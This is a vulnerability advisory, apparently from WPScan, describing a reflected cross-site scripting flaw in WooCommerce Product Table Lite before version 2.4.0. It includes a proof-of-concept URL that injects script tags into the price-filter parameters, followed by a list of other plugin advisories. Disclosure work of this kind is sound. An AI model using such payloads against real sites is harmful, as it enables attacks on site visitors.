WooCommerce Product Table Lite < 2.4.0 – Reflected Cross-Site Scripting | Plugin Vulnerabilities

Description

The plugin does not escape the price_range_min and price_range_max parameters before outputting them back in attributes, leading a Reflected Cross-Site Scripting issue

Proof of Concept

On a page where there is a Product Table with a Price filter, append the following payload to the min and max price filters:"><script>alert(/XSS/)

https://example.com/page-with-table-and-price-filter/?1601_price_range=option_0&1601_price_range_max=50"><script>alert(/XSS-max/)</script>&1601_price_range_min=10"><script>alert(/XSS-min/)</script>&

Affects Plugins

wc-product-table-lite

Fixed in 2.4.0

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

1b0fdc4e-5f7b-4d95-b2a7-7e3954b759fa

Timeline

Publicly Published

2021-09-27 (about 2 years ago)

Added

2021-09-27 (about 2 years ago)

Last Updated

2021-09-27 (about 2 years ago)

Other

Published

Title

Published

2023-05-15

Title

Drop Shadow Boxes < 1.7.11 - Contributor+ Cross-Site Scripting

Published

2014-04-28

Title

Keyword Strategy Internal Links <= 2.0 - XSS

Published

2024-03-28

Title

Slider by Supsystic < 1.8.11 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2021-12-14

Title

Simple Image Gallery <= 1.0.6 - Reflected Cross-Site Scripting

Published

2021-10-05

Title

WP-Recall < 16.24.48 - Reflected Cross-Site Scripting